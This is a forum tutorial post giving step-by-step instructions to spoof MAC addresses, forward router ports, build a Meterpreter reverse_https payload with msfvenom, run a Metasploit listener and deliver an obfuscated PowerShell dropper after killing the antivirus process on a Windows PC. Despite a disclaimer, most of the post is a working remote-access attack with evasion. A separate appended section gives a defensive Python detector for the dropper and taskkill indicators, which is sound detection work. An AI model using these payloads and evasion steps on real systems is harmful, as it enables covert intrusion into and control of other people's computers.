Learn About Computers

Teaching about Computers



    Aof
    Admin

    Posts : 95
    Join date : 2018-03-24

    27. Wlan Payload Creation, Router Settings, Open Listener, & Hacking Test

    Post by Aof on Wed May 30, 2018 2:42 am


    *I do not Condone Hacking into other People's Pcs, so please only use this tutorial to "hack" your own machine.*
    ----
    wlan, Wide Local Area Network Payload creation

    PHASE 1: Spoofing the Linux identity, setting up the routers, creating the payload, starting the listener.
    1. service network-manager stop = Stops the network interfaces on the Linux machine so that they can be changed.
    2. nano /etc/hosts = change the hostname.
    3. nano /etc/hostname = change the hostname.
    4. macchanger -r eth0 = assigns our wired eth0 interface a random MAC address.
    Open mlist and choose a manufacturer to spoof the MAC address with.
    5. macchanger -m 00:00:00:00:00:00 eth0 = use the chosen manufacturer's prefix for the first 6 hex digits, and keep the random MAC address for the last 6 digits.
    6. macchanger -m 00:00:00:00:00:00 lo = spoof the lo interface using the same chosen MAC address.
    7. macchanger -m 00:00:00:00:00:00 wlan0 = spoof the wlan0 interface, if it exists, using the same chosen MAC address.
    8. service network-manager start = starts network-manager again. If wlan0 existed and we were using Wi-Fi, we would have to bring it down with ifconfig wlan0 down and change it again, because wireless interfaces like being a little more difficult than wired ones.
    9. macchanger -s eth0 = shows the eth0 interface's MAC address.
    10. macchanger -s lo = shows the lo interface's MAC address.
    11. ifconfig = shows all of the network interfaces that are up.
    12. Copy your inet address, which is the local IP of the Linux machine.
    13. Change the last digit to 1 to reach the secondary Trendnet router's page (unless you have altered your DHCP settings previously; if you have, you must remember what you set it to, 2 maybe?).
    14. Log in to the router page, go to Advanced, DMZ, and set the local IP of your Linux machine as the DMZ.
    Now go to Status: "IP address" is the secondary router's IP, the one the 1st router assigned it; take note of that.
    Go to Gateway to get the gateway IP, and use it to reach the 1st router's page. Under Port Triggering on the 1st router's page, you'll want to port-trigger "443" to your 1st router's public IP,
    and port-forward port "443" (Virtual Server) through the 1st router to your 2nd router's IP address, which is the IP address that your first router assigned your secondary Trendnet router.

    Copy the "Public IP" of the 1st router; you'll need it to create the payload.
    15. service network-manager stop = After you make changes to the router page, shut down your interfaces and bring them back up.
    16. service network-manager start = Of course, if you were using wireless internet, you'd have to do the ifconfig wlan0 down step again and re-change your wireless MAC as well.
    This is the equivalent of ipconfig /release and ipconfig /renew on a Windows PC.
    17. ping duckduckgo.com = You can ping duckduckgo to see if you're online again, then run macchanger -s again on all of your up interfaces to check whether the MAC address is still spoofed.
    18. msfvenom -p windows/meterpreter/reverse_https LHOST=0.0.0.0 LPORT=443 -f psh-cmd -o ~/Desktop/f/thefile.bat = set LHOST to the public IP of your first router and LPORT to 443. Port 443 is the default HTTPS port that browsers use to look things up, so it is very commonly open.
    19. Plug in a USB stick, copy thefile.bat (the payload file) to the USB stick, then unmount the USB stick so that it will run okay on Windows 7 and not be corrupted when we bring it there.
    20. cd ~/Desktop/rc = Navigate to the pre-created rc folder on the Desktop.
    Below is the script of file.rc
    =*=
    Code:
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_https
    set LHOST 0.0.0.0
    set LPORT 443
    set ReverseListenerBindAddress 0.0.0.0
    set ExitOnSession false
    exploit -j -z
    1st line, chooses the handler to use.
    2nd line, sets the payload to use.
    3rd line, LHOST: the public IP of the 1st router should go here.
    4th line, LPORT: port 443 should go here.
    5th line, ReverseListenerBindAddress: the local IP of your Linux machine should go here; the handler binds to it, and connections that arrive at the public IP are forwarded on to your local machine.
    6th line, sets ExitOnSession to false (note the spelling of the option; with it set to false the handler keeps listening after a session ends).
    7th line, tells msfconsole to accept new connections and place them in the "background",
    leaving each one connected until you're ready to proceed,
    while still looking for other connections that may happen
    (if you are listening for multiple PC connections, for example,
    or want to look at a connection to make sure
    it's the right one before interacting with it and navigating).

    21. msfconsole -r file.rc = During our LAN (local area network) pentest earlier, we typed msfconsole and entered the commands manually for a learning experience; we could have just created an rc file. Now that you know your way around a bit, you can use -r to run msfconsole from your file.rc and automate the setup of the listener.
    22. Notice how, when the listener has been started, it says
    Started HTTPS reverse handler on https://1.2.3.4:443 (if 1.2.3.4 is the IP of your local machine).
    That means it's listening on your local Linux IP address, using port 443.
    23. https://www.yougetsignal.com/tools/open-ports/ = Type in the public IP of the 1st router and check whether port 443 is open or not.
    If the port says open, it's ready to make the connection; the target PC just needs to click the payload to call the Linux PC that's listening for it.

    PHASE TWO: Transferring the payload into the fi.bat test file
    24. On a Windows 7 PC, search Windows for Microsoft, go into Settings, and turn off real-time protection.
    25. taskkill /im explorer.exe /f & taskkill /im msseces.exe /f & explorer.exe = kills the explorer.exe process, which is Windows File Explorer, kills the virus scanner process, then brings Explorer back up.
    26. After it's dead, plug in the USB stick, right-click the fi file and edit it with notepad.exe (make sure word wrap is off, as we did while editing .bat files in the previous tutorials), and highlight the INSERT-HERE portion that is inside the (') quotes.
    Copy and paste the payload PowerShell command into the INSERT-HERE portion of the file.

    Contents of fi.bat file
    =*=
    Code:
    @echo off & powershell -w 1 -C "sv x -;sv ZO ec;sv h ((gv x).value.toString()+(gv ZO).value.toString());powershell (gv h).value.toString() 'INSERT-HERE'" > nul
    exit

    27. If you are curious why I decided to alter the file: in 2016 the file was generated differently, with a more concealed command; this method is a lot better for staying hidden.

    The same method is also used in the 3 .bat files that were used earlier in the LAN pentest.
    28. Now double-click "fi.bat" and go back to the Linux PC to test whether it works or not.
    29. Sometimes port 443 closes by itself on the public IP address; if this happens you can perform the following.
    30. service network-manager stop = brings down your interfaces.
    31. service network-manager start = starts the interfaces again. Of course, keep in mind that if you're using Wi-Fi you'll need to perform the extra "ifconfig wlan0 down" step to change the wireless MAC address, because wireless is more difficult to change.
    32. ping duckduckgo.com = checks whether you're online.
    33. macchanger -s eth0 = checks the wired connection's MAC address.
    34. macchanger -s lo = checks the lo interface's MAC address.
    35. If it's still closed, visit your 1st and 2nd router pages again and double-check the ports.
    Sometimes the routers randomly close your ports for a couple of seconds or minutes, or maybe the ports just get busy and the connection isn't able to be made right then.
    36. Now the public IP port shows as open on yougetsignal.com, so it will accept connections and forward them to the Linux local IP address.
    37. In the listener handler that was left open, the connection has now been made.
    38. sessions -i = may be required to view whether there are any active connections in the listener.
    39. sessions -i 1 = sessions -i followed by an ID number will interact with that session. Always make sure to view the information of the connection before you connect to it.
    You'll want to make sure that it's your PC that is trying to connect to your listener before you connect to it. If it fails to load information, just wait a few seconds and try "sessions -i" again. We certainly wouldn't want to "hack" someone else, or a spider security robot that is going around the web looking for connections that will connect to it, since that would be illegal.
    Now you have a successful Meterpreter session.
    40. pwd = shows the present working directory of the user you're connected to, i.e. where your PowerShell connection was established; in this case the file was clicked from the user's desktop, so that is shown as the present working directory.
    41. help = another thing that should be noted is that after you have made a successful connection to a computer, you can type help to view the Meterpreter help page, which is filled with useful information for using Meterpreter.
    42. background = backgrounds a Meterpreter session, and leaves the option to reconnect to it open.
    The test was successful.
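From the defender's side, the fi.bat dropper and the taskkill chain in this post leave very recognisable traces in Windows process-creation telemetry (Sysmon Event ID 1 or Security event 4688 command lines). The following detector is an added example, not part of Aof's post: it scans command lines for the indicators the post itself shows (the hidden-window switch, the sv/gv alias trick that assembles the "-ec" switch from pieces, a powershell launching a second powershell, the resulting child process running an encoded command, and taskkill against msseces.exe). The rule names, the strong/weak threshold and the sample command lines are this example's own constructions; the base64 blob in the sample is a dummy, not a payload.

```python
import re

# Added example (not from the post above): a small detector for the indicators
# the post's fi.bat / taskkill chain leaves in process-creation command lines.
# Rule names and thresholds are this example's own choices.
RULES = [
    # powershell -w 1 / -WindowStyle Hidden: the dropper hides its window
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+(?:1|hidden)\b", re.I)),
    # sv x -;sv ZO ec : building the "-ec" switch from pieces via aliases
    ("flag_assembly", re.compile(r"\bsv\s+\w+\s+-\s*;", re.I)),
    # (gv x).value.toString()+ : concatenating the pieces at run time
    ("gv_concat", re.compile(r"\(gv\s+\w+\)\.value\.tostring\(\)\s*\+", re.I)),
    # powershell launching a second powershell with the assembled switch
    ("nested_powershell", re.compile(r"powershell\b.*powershell\b", re.I | re.S)),
    # the child process that finally runs: powershell -ec <base64 blob>
    ("encoded_command",
     re.compile(r"\s-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    # taskkill against the Microsoft Security Essentials client process
    ("av_process_kill", re.compile(r"taskkill\b[^&|]*\bmsseces\.exe", re.I)),
]

# Indicators with no common benign use in this example's threat model.
STRONG = {"flag_assembly", "gv_concat", "encoded_command", "av_process_kill"}


def match_rules(cmdline):
    """Return the names of every rule that matches one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def is_suspicious(cmdline):
    """One strong indicator, or two weak ones together, is enough to alert.

    A hidden window or a nested powershell on its own is common in admin
    scripts, so those two only count in combination.
    """
    hits = match_rules(cmdline)
    return bool(STRONG.intersection(hits)) or len(hits) >= 2


def scan(command_lines):
    """Return (command_line, matched_rules) for every line worth alerting on."""
    return [(line, match_rules(line)) for line in command_lines if is_suspicious(line)]


# Constructed sample command lines, not real telemetry. Entries 2-4 mirror the
# post's fi.bat, its eventual child process (dummy base64, not a payload) and
# the taskkill chain; the rest are benign noise a real log would also contain.
SAMPLE_COMMAND_LINES = [
    r'cmd.exe /c "C:\Users\lab\Desktop\fi.bat"',
    'powershell -w 1 -C "sv x -;sv ZO ec;sv h ((gv x).value.toString()'
    '+(gv ZO).value.toString());powershell (gv h).value.toString() \'INSERT-HERE\'"',
    "powershell -ec " + "QUJD" * 12,
    "taskkill /im explorer.exe /f & taskkill /im msseces.exe /f & explorer.exe",
    "powershell -NoProfile -Command Get-Process",
    "powershell -w hidden -File C:\\scripts\\nightly-backup.ps1",
    r"notepad.exe C:\Users\lab\notes.txt",
]

if __name__ == "__main__":
    for line, hits in scan(SAMPLE_COMMAND_LINES):
        print(f"ALERT {hits}: {line[:70]}")
```

Running the block flags three of the seven sample lines: the dropper (four rules at once), the encoded-command child process and the taskkill chain. The hidden-window backup script is deliberately left alone, which is the tuning point a real deployment has to get right: the alias-assembly and AV-kill patterns can alert on their own, while a hidden window or a base64 command only becomes interesting in combination or in an environment that never uses them legitimately.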


